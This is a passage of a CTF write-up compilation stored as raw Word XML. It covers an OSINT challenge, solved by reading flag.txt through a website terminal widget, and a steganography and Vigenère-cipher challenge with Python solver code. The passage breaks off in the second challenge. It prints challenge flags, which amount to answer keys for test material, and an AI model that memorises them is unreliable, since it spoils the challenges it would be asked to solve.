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32EA" w14:textId="44966024" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1440" w:after="80"/>
        <w:jc w:val="center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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>CTF WRITEUP COMPILATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42000F9A" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center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00B4D8"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>CyberHx CTF — ZeroDayHeist Series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763638F" w14:textId="66D46EB1" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center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666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">June 2026  |  Authors: </w:t>
      </w:r>
      <w:r w:rsidR="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn_oh, </w:t>
      </w:r>
      <w:r w:rsidR="0011240C" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0xDvc</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, WR</w:t>
      </w:r>
      <w:r w:rsidR="006026F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF2BE8" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00D5087C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24743DA6" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>CHALLENGE OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7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880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="0039319E" w:rsidRPr="0011240C" w14:paraId="6DC8DB64" w14:textId="77777777" w:rsidTr="0039319E">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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BF08" w14:textId="77777777" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E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#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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5272" w14:textId="77777777" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E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Challenge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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D6A0" w14:textId="77777777" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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91A9" w14:textId="002AEB34" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E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P</w:t>
            </w:r>
            <w:r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TS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0039319E" w:rsidRPr="0011240C" w14:paraId="67E96466" w14:textId="77777777" w:rsidTr="0039319E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8C5B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01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50CD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Terminal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CF32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OSINT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7B6C" w14:textId="77777777" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E" w:rsidP="0011240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300</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0039319E" w:rsidRPr="0011240C" w14:paraId="2B3CA262" w14:textId="77777777" w:rsidTr="0039319E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9071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02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34C4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Phantom Cipher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40478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Steg + Crypto (LSB + Vigenere)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2B15" w14:textId="77777777" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E" w:rsidP="0011240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500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0039319E" w:rsidRPr="0011240C" w14:paraId="698ECF44" w14:textId="77777777" w:rsidTr="0039319E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6085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03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9CC5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Professor Mind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FEBDD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SSRF + File Read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3CE6" w14:textId="17D73413" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E" w:rsidP="0011240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40C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</w:tr>
      <w:tr w:rsidR="0039319E" w:rsidRPr="0011240C" w14:paraId="6E90A54A" w14:textId="77777777" w:rsidTr="0039319E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4855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04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BC8C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Bella Ciao Secure Comms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0E43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SSTI + Session Forge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2483" w14:textId="59135F68" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E" w:rsidP="0011240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40C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</w:tr>
      <w:tr w:rsidR="0039319E" w:rsidRPr="0011240C" w14:paraId="1F948606" w14:textId="77777777" w:rsidTr="0039319E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F0EF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05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CDC7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Cryptography is Fun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13AD" w14:textId="77777777" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E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Base58 + Base64 Multi-layer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9928" w14:textId="2B4787E3" w:rsidR="0039319E" w:rsidRPr="0011240C" w:rsidRDefault="0039319E" w:rsidP="0011240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40C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</w:tr>
    </w:tbl>
    <w:p w14:paraId="37718475" w14:textId="4BC56E4F" w:rsidR="00394200" w:rsidRPr="0011240C" w:rsidRDefault="00394200">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1009BC" w14:textId="324EBA90" w:rsidR="00394200" w:rsidRDefault="00394200">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394200">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1157FF7B" wp14:editId="01DD42D4">
            <wp:extent cx="5943600" cy="1316355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73897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71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7581" w14:textId="77777777" w:rsidR="00394200" w:rsidRDefault="00394200">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D391AA5" w14:textId="77777777" w:rsidR="00394200" w:rsidRDefault="00394200">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1B0D4E" w14:textId="77777777" w:rsidR="00394200" w:rsidRDefault="00394200">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DA0C52" w14:textId="77777777" w:rsidR="00394200" w:rsidRDefault="00394200">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CCBB09" w14:textId="77777777" w:rsidR="00394200" w:rsidRDefault="00394200">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60776847" w14:textId="72F347A2" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr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lastRenderedPageBreak/>
        <w:t>Challenge 01 — Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE86493" w14:textId="7EA7625A" w:rsidR="00D5087C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Category: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Points: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">300  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: </w:t>
      </w:r>
      <w:r w:rsidR="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t>pwn_oh</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE9777" w14:textId="6AAB2E43" w:rsidR="00AE5E00" w:rsidRPr="0011240C" w:rsidRDefault="00AE5E00">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441ABD3F" wp14:editId="0AF61373">
            <wp:extent cx="5943600" cy="3825240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="213996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65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541C" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412A7EA" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="8" w:space="4" w:color="00B4D8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF6FF"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="24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i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>"somewhere in the cyberhx flags hidden in plain format, just found where we see company info, flag format CyberHx{}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC08BA7" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Key Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA8918" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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"company info" — points toward researching the CyberHx company itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A2845" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000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"hidden in plain" — the flag is publicly visible; no exploitation required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57D502" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A935D75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Step 1 — Google Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72752007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Searched for "cyberhx company" on the web. The top results included the official website at cyberhx.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A942C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Step 2 — Confirm the Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F3178E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Visited cyberhx.com and confirmed it was the CTF organizer by spotting the live ZeroDay Heist event banner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB6593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Step 3 — Navigate to the About Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D47AB8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Re-reading the description: "just found where we see company info" directly hints at the About page. Navigated to cyberhx.com/about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C748ECD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lastRenderedPageBreak/>
        <w:t>Step 4 — Interact with the Terminal Widget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9743E3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The About page contained an interactive terminal widget. Listed the directory contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C142738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$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C315B53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2C8939AC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pages/   about.html   contact.html   flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27765001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00E80C03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$ cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612173CE" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="0A2342"/>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>🚩</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C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  FLAG: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CyberHx{y8u_d1d_1t}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B647FD3" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Key Takeaway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5724B3" w14:textId="4C42655A" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000" w:rsidP="003942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Classic OSINT hidden-in-plain-sight challenge. No exploitation was needed — only careful reading of the description and knowing where to look. The phrase 'company info' was the direct hint pointing to the About page of the CyberHx website.</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="413074A2" w14:textId="7AF735DA" w:rsidR="00AE5E00" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr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lastRenderedPageBreak/>
        <w:t>Challenge 02 — Phantom Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788D2FC" w14:textId="0EF219A4" w:rsidR="00AE5E00" w:rsidRDefault="00AE5E00">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78CE6E68" wp14:editId="2CAFCE3F">
            <wp:extent cx="5943600" cy="4831715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="114795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51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C3B3" w14:textId="5A49427E" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="16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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Category: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">Steganography + Cryptography  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Points: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">500  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: </w:t>
      </w:r>
      <w:r w:rsidR="0011240C" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t>0xDvc</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AC7170" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C888D23" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="8" w:space="4" w:color="00B4D8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF6FF"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="24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i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>"A blurry image hides a key fragment via LSB steganography. Combined with a structural key derived from the ciphertext, you reconstruct the full key for a custom Vigenere-variant cipher."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B3B15" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Step 1 — File Inspection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17364410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$ file challenge.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DDCC78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challenge.png: PNG image data, 500x500, 8-bit/color RGB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9C2FA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The file is a PNG (lossless format) — suitable for LSB steganography. JPEG would not work as lossy compression destroys LSB data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9D12E" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Step 2 — LSB Key Fragment Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A9BD1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LSB (Least Significant Bit) steganography hides data by altering the lowest bit of each pixel — a ±1 change in colour value that is imperceptible to the human eye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F586D0D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lastRenderedPageBreak/>
        <w:t>from PIL import Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C7A8C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0CD5F2C7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def extract_lsb(image_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF6C53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img = Image.open(image_path).convert('RGB')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7B7030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pixels = list(img.getdata())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408BB894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bits = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34E91F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for r, g, b in pixels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E01E8E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bits.append(r &amp; 1)  # Extract LSB from R channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0114AF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chars = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50837B61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for i in range(0, len(bits) - 7, 8):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F21112D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byte = int(''.join(str(b) for b in bits[i:i+8]), 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129CDC7E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if byte == 0: break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C38BE4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chars.append(chr(byte))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA738F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return ''.join(chars)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75900498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310D3EA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key_fragment = extract_lsb('challenge.png')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64290A7E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print(key_fragment)  # =&gt; PHNTM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158479B7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Key fragment recovered: PHNTM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E1136" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Step 3 — Structural Key Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66271324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The structural key is hidden within the ciphertext structure (first character of each word, or a positional pattern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041633B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structural_key = ''.join(word[0] for word in ciphertext.split())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA623F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After applying pattern filter =&gt; CIPHER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0927ED45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Structural key: CIPHER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC6367F" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Step 4 — Full Key Assembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E259C72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full_key = key_fragment + structural_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EFBA59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 = "PHNTM" + "CIPHER"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECCC89D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 = "PHNTMCIPHER"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139188A" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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Step 5 — Vigenere-Variant Decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F1004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Decryption formula: P[i] = (C[i] - K[i mod len(K)] + 26) mod 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC657E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def vigenere_decrypt(ciphertext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26E25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key = key.upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C681C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result = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D2BB3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key_idx = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832304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for char in ciphertext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787384E9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if char.isalpha():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BECC6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    shift = ord(key[key_idx % len(key)]) - ord('A')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4DC64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    base  = ord('A') if char.isupper() else ord('a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177D90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    result.append(chr((ord(char) - base - shift + 26) % 26 + base))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD8CEE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    key_idx += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A44087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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454C727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    result.append(char)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0A0D7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return ''.join(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB72EDE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548E07E3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flag = vigenere_decrypt(ciphertext, "PHNTMCIPHER")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D17870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print(flag)  # =&gt; phantom_signal_recovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A064CE2" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="0A2342"/>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
